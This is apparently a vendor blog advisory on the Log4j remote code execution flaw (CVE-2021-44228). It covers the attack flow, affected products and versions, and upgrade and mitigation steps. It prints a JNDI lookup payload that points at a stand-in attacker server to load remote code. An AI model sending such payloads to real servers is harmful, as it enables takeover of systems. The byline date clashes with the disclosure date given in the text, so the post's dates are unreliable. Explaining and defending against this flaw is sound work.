Cloud Security

Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability: Proof of Concept and Remediation Guidance

A new vulnerability, CVE-2021-44228, was discovered in Log4j, a popular open-source Java logging framework distributed under Apache Software License.

Anand Prakash

Written by Anand Prakash

September 13, 2021 | 3 min read

On the 9th of December, 2021, a new vulnerability, CVE-2021-44228, was discovered in Log4j, a popular open-source Java logging framework distributed under Apache Software License. The vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without a username and password.

Due to the severity of this vulnerability, PingSafe strongly recommends that customers apply the updates to their library quickly.

Shortly after the release of the vulnerability, PingSafe added the exploit in the scans to ensure alerts from the zero-day exploit.

About the RCE vulnerability

Java logging framework Log4j is used to generate logs and record the activity inside an application. The vulnerability can be exploited to allow unauthorized remote code execution on the affected servers. Hackers are still utilizing the recently discovered exploit to attack the servers. The exploit lets an attacker execute malicious Java code on the vulnerable server.

  • The attacker will invoke any server endpoint with a malicious payload.
  • The server logs the data in the request using the Log4j library, containing the malicious payload: ${jndi:ldap://attacker-server.com} 

Here, “attacker-server” refers to the hacker-owned server.

  • This payload triggers the log4j vulnerability, sending a request to the attacker’s server.
  • The request is made via JNDI (Java Naming and Directory Interface), which responds with a remote Java class file.
  • The remote class file is injected into the server, which acts as the second triggering payload and provides remote code execution access to the attacker.

Affected systems and products

Various applications and cloud services using Apache Struts are under the radar of this attack. However, security researchers have already discovered that the Log4j vulnerability can be exploited in servers operated by Apple, Cloudflare, Twitter, and other large companies. 

It is highly recommended to upgrade the Log4j framework to log4j-2.15.0-rc2 or higher.

Affected applications include ElasticSearch, Elastic LogStash, GrayLog2, Minecraft, Neo4J, many Apache projects (Druid, Hadoop, Kafka, Solr, Struts), many Cisco products ((Cisco Umbrella, Cisco DNA Spaces, Duo, Cisco Webex), many VMware products (Horizon, vCenter, vRealize, Tanzu), Grails, and dozens if not hundreds of others.

The following versions of Log4j are impacted:

2.0 <= version <= 2.14.1

You can check the PingSafe dashboard under Asset Security to find out if your servers are secure.

PingSafe Dashboard

Steps for remediation

The latest version of Log4j has been released on the official website. You can download it and upgrade your service to use the newest version.

Although it is recommended to upgrade to the latest version of Log4j, you can also secure servers running on the previous versions. This can be done by adding “formatMsgNoLookups=true” to the servers running above version 2.10.0 and higher. This statement is not required for the updated version as it has become the default behavior.

References

NVD – CVE-2021-44228 

How PingSafe can help?‍

PingSafe can detect this Log4j vulnerability on your infrastructure without having an agent in place. Book a free personalized demo to see how PingSafe uses an agentless approach to protect your cloud infrastructure from this and new zero-day vulnerabilities.